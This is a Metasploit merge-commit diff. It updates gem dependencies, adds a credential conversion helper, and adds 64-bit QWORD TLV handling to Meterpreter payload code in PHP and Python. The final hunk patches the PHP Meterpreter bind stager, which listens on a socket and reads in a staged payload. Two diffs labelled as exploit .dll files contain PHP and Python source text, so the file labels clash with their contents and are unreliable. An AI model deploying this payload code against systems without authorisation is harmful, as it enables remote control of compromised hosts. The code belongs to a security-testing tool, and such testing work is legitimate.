Merge branch 'staging/electro-release' into feature/MSP-9707/smb-bruteforce-refactor

Conflicts:
	lib/metasploit/framework/login_scanner/smb.rb

Author: egypt

Gemfile

@@ -7,9 +7,9 @@ group :db do
   # Needed for Msf::DbManager
   gem 'activerecord', '>= 3.0.0', '< 4.0.0'
   # Metasploit::Credential database models
-  gem 'metasploit-credential', git: 'github-metasploit-credential:rapid7/metasploit-credential.git', tag: 'v0.4.8-electro-release'
+  gem 'metasploit-credential', git: 'github-metasploit-credential:rapid7/metasploit-credential.git', tag: 'v0.5.6.pre.electro.pre.release'
   # Database models shared between framework and Pro.
-  gem 'metasploit_data_models', '~> 0.17.2.pre.metasploit.pre.data.pre.models.pre.search'
+  gem 'metasploit_data_models', '>= 0.18.0', '< 0.19'
   # Needed for module caching in Mdm::ModuleDetails
   gem 'pg', '>= 0.11'
 end

Gemfile.lock

@@ -1,12 +1,12 @@
 GIT
   remote: github-metasploit-credential:rapid7/metasploit-credential.git
-  revision: b7234221ce41e311947e3e32c03aa7b6474f4f4f
-  tag: v0.4.8-electro-release
+  revision: 8a8b4f74535d728b1852e4d4d55abb9d828b8a8a
+  tag: v0.5.6.pre.electro.pre.release
   specs:
-    metasploit-credential (0.4.8.pre.electro.pre.release)
+    metasploit-credential (0.5.6.pre.electro.pre.release)
       metasploit-concern (~> 0.1.0)
-      metasploit-model (>= 0.24.1.pre.semantic.pre.versioning.pre.2.pre.0, < 0.25)
-      metasploit_data_models (>= 0.17.2.pre.metasploit.pre.data.pre.models.pre.search, < 0.18)
+      metasploit-model (>= 0.25.1, < 0.26)
+      metasploit_data_models (>= 0.18.0, < 0.19)
       rubyntlm
       rubyzip (~> 1.1)
 
@@ -67,14 +67,15 @@ GEM
     i18n (0.6.9)
     journey (1.0.4)
     json (1.8.1)
-    metasploit-concern (0.1.0)
+    metasploit-concern (0.1.1)
       activesupport (~> 3.0, >= 3.0.0)
-    metasploit-model (0.24.1.pre.semantic.pre.versioning.pre.2.pre.0)
+    metasploit-model (0.25.2)
       activesupport
-    metasploit_data_models (0.17.2.pre.metasploit.pre.data.pre.models.pre.search)
+    metasploit_data_models (0.18.0)
       activerecord (>= 3.2.13, < 4.0.0)
       activesupport
-      metasploit-model (>= 0.24.1.pre.semantic.pre.versioning.pre.2.pre.0, < 0.25)
+      metasploit-concern (~> 0.1.0)
+      metasploit-model (>= 0.25.1, < 0.26)
       pg
     method_source (0.8.2)
     mini_portile (0.6.0)
@@ -157,7 +158,7 @@ DEPENDENCIES
   fivemat (= 1.2.1)
   metasploit-credential!
   metasploit-framework!
-  metasploit_data_models (~> 0.17.2.pre.metasploit.pre.data.pre.models.pre.search)
+  metasploit_data_models (>= 0.18.0, < 0.19)
   network_interface (~> 0.0.1)
   pcaprub
   pg (>= 0.11)

app/concerns/metasploit/credential/core/to_credential.rb

@@ -0,0 +1,22 @@
+# Adds associations to `Metasploit::Credential::Core` which are inverses of association on models under
+# {BruteForce::Reuse}.
+require 'metasploit/framework/credential'
+
+module Metasploit::Credential::Core::ToCredential
+  extend ActiveSupport::Concern
+  
+  included do
+    
+    def to_credential
+      Metasploit::Framework::Credential.new(
+        public:       public.try(:username), 
+        private:      private.try(:data), 
+        private_type: private.try(:type).try(:demodulize).try(:underscore).try(:to_sym), 
+        realm:        realm.try(:value), 
+        realm_key:    realm.try(:key) 
+      )
+    end
+    
+  end
+  
+end

data/exploits/CVE-2013-5045/CVE-2013-5045.dll

@@ -6,10 +6,10 @@
 ##
 # General
 ##
-define("TLV_TYPE_HANDLE",              TLV_META_TYPE_UINT    |  600);
+define("TLV_TYPE_HANDLE",              TLV_META_TYPE_QWORD   |  600);
 define("TLV_TYPE_INHERIT",             TLV_META_TYPE_BOOL    |  601);
-define("TLV_TYPE_PROCESS_HANDLE",      TLV_META_TYPE_UINT    |  630);
-define("TLV_TYPE_THREAD_HANDLE",       TLV_META_TYPE_UINT    |  631);
+define("TLV_TYPE_PROCESS_HANDLE",      TLV_META_TYPE_QWORD   |  630);
+define("TLV_TYPE_THREAD_HANDLE",       TLV_META_TYPE_QWORD   |  631);
 
 ##
 # Fs
@@ -65,7 +65,7 @@
 define("PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN", (1 << 3));
 
 # Registry
-define("TLV_TYPE_HKEY",                TLV_META_TYPE_UINT    | 1000);
+define("TLV_TYPE_HKEY",                TLV_META_TYPE_QWORD   | 1000);
 define("TLV_TYPE_ROOT_KEY",            TLV_TYPE_HKEY);
 define("TLV_TYPE_BASE_KEY",            TLV_META_TYPE_STRING  | 1001);
 define("TLV_TYPE_PERMISSION",          TLV_META_TYPE_UINT    | 1002);
@@ -90,12 +90,12 @@
 define("DELETE_KEY_FLAG_RECURSIVE", (1 << 0));
 
 # Process
-define("TLV_TYPE_BASE_ADDRESS",        TLV_META_TYPE_UINT    | 2000);
+define("TLV_TYPE_BASE_ADDRESS",        TLV_META_TYPE_QWORD   | 2000);
 define("TLV_TYPE_ALLOCATION_TYPE",     TLV_META_TYPE_UINT    | 2001);
 define("TLV_TYPE_PROTECTION",          TLV_META_TYPE_UINT    | 2002);
 define("TLV_TYPE_PROCESS_PERMS",       TLV_META_TYPE_UINT    | 2003);
 define("TLV_TYPE_PROCESS_MEMORY",      TLV_META_TYPE_RAW     | 2004);
-define("TLV_TYPE_ALLOC_BASE_ADDRESS",  TLV_META_TYPE_UINT    | 2005);
+define("TLV_TYPE_ALLOC_BASE_ADDRESS",  TLV_META_TYPE_QWORD   | 2005);
 define("TLV_TYPE_MEMORY_STATE",        TLV_META_TYPE_UINT    | 2006);
 define("TLV_TYPE_MEMORY_TYPE",         TLV_META_TYPE_UINT    | 2007);
 define("TLV_TYPE_ALLOC_PROTECTION",    TLV_META_TYPE_UINT    | 2008);
@@ -109,16 +109,16 @@
 define("TLV_TYPE_IMAGE_FILE",          TLV_META_TYPE_STRING  | 2400);
 define("TLV_TYPE_IMAGE_FILE_PATH",     TLV_META_TYPE_STRING  | 2401);
 define("TLV_TYPE_PROCEDURE_NAME",      TLV_META_TYPE_STRING  | 2402);
-define("TLV_TYPE_PROCEDURE_ADDRESS",   TLV_META_TYPE_UINT    | 2403);
-define("TLV_TYPE_IMAGE_BASE",          TLV_META_TYPE_UINT    | 2404);
+define("TLV_TYPE_PROCEDURE_ADDRESS",   TLV_META_TYPE_QWORD   | 2403);
+define("TLV_TYPE_IMAGE_BASE",          TLV_META_TYPE_QWORD   | 2404);
 define("TLV_TYPE_IMAGE_GROUP",         TLV_META_TYPE_GROUP   | 2405);
 define("TLV_TYPE_IMAGE_NAME",          TLV_META_TYPE_STRING  | 2406);
 
 define("TLV_TYPE_THREAD_ID",           TLV_META_TYPE_UINT    | 2500);
 define("TLV_TYPE_THREAD_PERMS",        TLV_META_TYPE_UINT    | 2502);
 define("TLV_TYPE_EXIT_CODE",           TLV_META_TYPE_UINT    | 2510);
-define("TLV_TYPE_ENTRY_POINT",         TLV_META_TYPE_UINT    | 2511);
-define("TLV_TYPE_ENTRY_PARAMETER",     TLV_META_TYPE_UINT    | 2512);
+define("TLV_TYPE_ENTRY_POINT",         TLV_META_TYPE_QWORD   | 2511);
+define("TLV_TYPE_ENTRY_PARAMETER",     TLV_META_TYPE_QWORD   | 2512);
 define("TLV_TYPE_CREATION_FLAGS",      TLV_META_TYPE_UINT    | 2513);
 
 define("TLV_TYPE_REGISTER_NAME",       TLV_META_TYPE_STRING  | 2540);
@@ -137,7 +137,7 @@
 # Event Log
 ##
 define("TLV_TYPE_EVENT_SOURCENAME",    TLV_META_TYPE_STRING  | 4000);
-define("TLV_TYPE_EVENT_HANDLE",        TLV_META_TYPE_UINT    | 4001);
+define("TLV_TYPE_EVENT_HANDLE",        TLV_META_TYPE_QWORD   | 4001);
 define("TLV_TYPE_EVENT_NUMRECORDS",    TLV_META_TYPE_UINT    | 4002);
 
 define("TLV_TYPE_EVENT_READFLAGS",     TLV_META_TYPE_UINT    | 4003);

data/exploits/CVE-2014-0257/CVE-2014-0257.dll

@@ -252,6 +252,7 @@ class RTATTR(ctypes.Structure):
 TLV_META_TYPE_UINT       = (1 << 17)
 TLV_META_TYPE_RAW        = (1 << 18)
 TLV_META_TYPE_BOOL       = (1 << 19)
+TLV_META_TYPE_QWORD      = (1 << 20)
 TLV_META_TYPE_COMPRESSED = (1 << 29)
 TLV_META_TYPE_GROUP      = (1 << 30)
 TLV_META_TYPE_COMPLEX    = (1 << 31)
@@ -284,10 +285,10 @@ class RTATTR(ctypes.Structure):
 ##
 # General
 ##
-TLV_TYPE_HANDLE                = TLV_META_TYPE_UINT    | 600
+TLV_TYPE_HANDLE                = TLV_META_TYPE_QWORD   | 600
 TLV_TYPE_INHERIT               = TLV_META_TYPE_BOOL    | 601
-TLV_TYPE_PROCESS_HANDLE        = TLV_META_TYPE_UINT    | 630
-TLV_TYPE_THREAD_HANDLE         = TLV_META_TYPE_UINT    | 631
+TLV_TYPE_PROCESS_HANDLE        = TLV_META_TYPE_QWORD   | 630
+TLV_TYPE_THREAD_HANDLE         = TLV_META_TYPE_QWORD   | 631
 
 ##
 # Fs
@@ -346,7 +347,7 @@ class RTATTR(ctypes.Structure):
 ##
 # Registry
 ##
-TLV_TYPE_HKEY                  = TLV_META_TYPE_UINT    | 1000
+TLV_TYPE_HKEY                  = TLV_META_TYPE_QWORD   | 1000
 TLV_TYPE_ROOT_KEY              = TLV_TYPE_HKEY
 TLV_TYPE_BASE_KEY              = TLV_META_TYPE_STRING  | 1001
 TLV_TYPE_PERMISSION            = TLV_META_TYPE_UINT    | 1002
@@ -376,12 +377,12 @@ class RTATTR(ctypes.Structure):
 ##
 # Process
 ##
-TLV_TYPE_BASE_ADDRESS          = TLV_META_TYPE_UINT    | 2000
+TLV_TYPE_BASE_ADDRESS          = TLV_META_TYPE_QWORD   | 2000
 TLV_TYPE_ALLOCATION_TYPE       = TLV_META_TYPE_UINT    | 2001
 TLV_TYPE_PROTECTION            = TLV_META_TYPE_UINT    | 2002
 TLV_TYPE_PROCESS_PERMS         = TLV_META_TYPE_UINT    | 2003
 TLV_TYPE_PROCESS_MEMORY        = TLV_META_TYPE_RAW     | 2004
-TLV_TYPE_ALLOC_BASE_ADDRESS    = TLV_META_TYPE_UINT    | 2005
+TLV_TYPE_ALLOC_BASE_ADDRESS    = TLV_META_TYPE_QWORD   | 2005
 TLV_TYPE_MEMORY_STATE          = TLV_META_TYPE_UINT    | 2006
 TLV_TYPE_MEMORY_TYPE           = TLV_META_TYPE_UINT    | 2007
 TLV_TYPE_ALLOC_PROTECTION      = TLV_META_TYPE_UINT    | 2008
@@ -397,16 +398,16 @@ class RTATTR(ctypes.Structure):
 TLV_TYPE_IMAGE_FILE            = TLV_META_TYPE_STRING  | 2400
 TLV_TYPE_IMAGE_FILE_PATH       = TLV_META_TYPE_STRING  | 2401
 TLV_TYPE_PROCEDURE_NAME        = TLV_META_TYPE_STRING  | 2402
-TLV_TYPE_PROCEDURE_ADDRESS     = TLV_META_TYPE_UINT    | 2403
-TLV_TYPE_IMAGE_BASE            = TLV_META_TYPE_UINT    | 2404
+TLV_TYPE_PROCEDURE_ADDRESS     = TLV_META_TYPE_QWORD   | 2403
+TLV_TYPE_IMAGE_BASE            = TLV_META_TYPE_QWORD   | 2404
 TLV_TYPE_IMAGE_GROUP           = TLV_META_TYPE_GROUP   | 2405
 TLV_TYPE_IMAGE_NAME            = TLV_META_TYPE_STRING  | 2406
 
 TLV_TYPE_THREAD_ID             = TLV_META_TYPE_UINT    | 2500
 TLV_TYPE_THREAD_PERMS          = TLV_META_TYPE_UINT    | 2502
 TLV_TYPE_EXIT_CODE             = TLV_META_TYPE_UINT    | 2510
-TLV_TYPE_ENTRY_POINT           = TLV_META_TYPE_UINT    | 2511
-TLV_TYPE_ENTRY_PARAMETER       = TLV_META_TYPE_UINT    | 2512
+TLV_TYPE_ENTRY_POINT           = TLV_META_TYPE_QWORD   | 2511
+TLV_TYPE_ENTRY_PARAMETER       = TLV_META_TYPE_QWORD   | 2512
 TLV_TYPE_CREATION_FLAGS        = TLV_META_TYPE_UINT    | 2513
 
 TLV_TYPE_REGISTER_NAME         = TLV_META_TYPE_STRING  | 2540
@@ -425,7 +426,7 @@ class RTATTR(ctypes.Structure):
 # Event Log
 ##
 TLV_TYPE_EVENT_SOURCENAME      = TLV_META_TYPE_STRING  | 4000
-TLV_TYPE_EVENT_HANDLE          = TLV_META_TYPE_UINT    | 4001
+TLV_TYPE_EVENT_HANDLE          = TLV_META_TYPE_QWORD   | 4001
 TLV_TYPE_EVENT_NUMRECORDS      = TLV_META_TYPE_UINT    | 4002
 
 TLV_TYPE_EVENT_READFLAGS       = TLV_META_TYPE_UINT    | 4003

data/meterpreter/ext_server_stdapi.php

@@ -125,6 +125,7 @@ function socket_set_option($sock, $type, $opt, $value) {
 define("TLV_META_TYPE_UINT",       (1 << 17));
 define("TLV_META_TYPE_RAW",        (1 << 18));
 define("TLV_META_TYPE_BOOL",       (1 << 19));
+define("TLV_META_TYPE_QWORD",      (1 << 20));
 define("TLV_META_TYPE_COMPRESSED", (1 << 29));
 define("TLV_META_TYPE_GROUP",      (1 << 30));
 define("TLV_META_TYPE_COMPLEX",    (1 << 31));
@@ -655,6 +656,11 @@ function tlv_pack($tlv) {
     if (($tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
         $ret = pack("NNa*", 8 + strlen($tlv['value'])+1, $tlv['type'], $tlv['value'] . "\0");
     }
+    elseif (($tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD) {
+        $hi = ($tlv['value'] >> 32) & 0xFFFFFFFF;
+        $lo = $tlv['value'] & 0xFFFFFFFF;
+        $ret = pack("NNNN", 8 + 8, $tlv['type'], $hi, $lo);
+    }
     elseif (($tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
         $ret = pack("NNN", 8 + 4, $tlv['type'], $tlv['value']);
     }
@@ -686,10 +692,17 @@ function tlv_unpack($raw_tlv) {
     my_print("len: {$tlv['len']}, type: {$tlv['type']}");
     if (($type & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
         $tlv = unpack("Nlen/Ntype/a*value", substr($raw_tlv, 0, $tlv['len']));
+        # PHP 5.5.0 modifed the 'a' unpack format to stop removing the trailing
+        # NULL, so catch that here
+        $tlv['value'] = str_replace("\0", "", $tlv['value']);
     }
     elseif (($type & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
         $tlv = unpack("Nlen/Ntype/Nvalue", substr($raw_tlv, 0, $tlv['len']));
     }
+    elseif (($type & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD) {
+        $tlv = unpack("Nlen/Ntype/Nhi/Nlo", substr($raw_tlv, 0, $tlv['len']));
+        $tlv['value'] = $tlv['hi'] << 32 | $tlv['lo'];
+    }
     elseif (($type & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) {
         $tlv = unpack("Nlen/Ntype/cvalue", substr($raw_tlv, 0, $tlv['len']));
     }
@@ -911,7 +924,8 @@ function read($resource, $len=null) {
         $r = Array($resource);
         my_print("Calling select to see if there's data on $resource");
         while (true) {
-            $cnt = stream_select($r, $w=NULL, $e=NULL, 0);
+            $w=NULL;$e=NULL;$t=0;
+            $cnt = stream_select($r, $w, $e, $t);
 
             # Stream is not ready to read, have to live with what we've gotten
             # so far
@@ -1147,7 +1161,8 @@ function remove_reader($resource) {
 # Main dispatch loop
 #
 $r=$GLOBALS['readers'];
-while (false !== ($cnt = select($r, $w=null, $e=null, 1))) {
+$w=NULL;$e=NULL;$t=1;
+while (false !== ($cnt = select($r, $w, $e, $t))) {
     #my_print(sprintf("Returned from select with %s readers", count($r)));
     $read_failed = false;
     for ($i = 0; $i < $cnt; $i++) {

data/meterpreter/ext_server_stdapi.py

@@ -54,6 +54,7 @@
 TLV_META_TYPE_UINT       = (1 << 17)
 TLV_META_TYPE_RAW        = (1 << 18)
 TLV_META_TYPE_BOOL       = (1 << 19)
+TLV_META_TYPE_QWORD      = (1 << 20)
 TLV_META_TYPE_COMPRESSED = (1 << 29)
 TLV_META_TYPE_GROUP      = (1 << 30)
 TLV_META_TYPE_COMPLEX    = (1 << 31)
@@ -150,6 +151,8 @@ def packet_enum_tlvs(pkt, tlv_type = None):
 				val = str(val.split(NULL_BYTE, 1)[0])
 			elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
 				val = struct.unpack('>I', val)[0]
+			elif (tlv[1] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
+				val = struct.unpack('>Q', val)[0]
 			elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
 				val = bool(struct.unpack('b', val)[0])
 			elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
@@ -175,6 +178,8 @@ def tlv_pack(*args):
 	data = ""
 	if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
 		data = struct.pack('>III', 12, tlv['type'], tlv['value'])
+	elif (tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
+		data = struct.pack('>IIQ', 16, tlv['type'], tlv['value'])
 	elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
 		data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(tlv['value']))), 'UTF-8')
 	else:

data/meterpreter/meterpreter.php

@@ -9,24 +9,27 @@
 	$srvsock = stream_socket_server("tcp://{$ipaddr}:{$port}");
 	if (!$srvsock) { die(); }
 	$s = stream_socket_accept($srvsock, -1);
+	fclose($srvsock);
 	$s_type = 'stream';
 } elseif (is_callable('socket_create_listen')) {
 	$srvsock = socket_create_listen(AF_INET, SOCK_STREAM, SOL_TCP);
 	if (!$res) { die(); }
 	$s = socket_accept($srvsock);
+	socket_close($srvsock);
 	$s_type = 'socket';
 } elseif (is_callable('socket_create')) {
 	$srvsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
 	$res = socket_bind($srvsock, $ipaddr, $port);
 	if (!$res) { die(); }
 	$s = socket_accept($srvsock);
+	socket_close($srvsock);
 	$s_type = 'socket';
 } else {
 	die();
 }
 if (!$s) { die(); }
 
-switch ($s_type) { 
+switch ($s_type) {
 case 'stream': $len = fread($s, 4); break;
 case 'socket': $len = socket_read($s, 4); break;
 }
@@ -40,7 +43,7 @@
 
 $b = '';
 while (strlen($b) < $len) {
-	switch ($s_type) { 
+	switch ($s_type) {
 	case 'stream': $b .= fread($s, $len-strlen($b)); break;
 	case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
 	}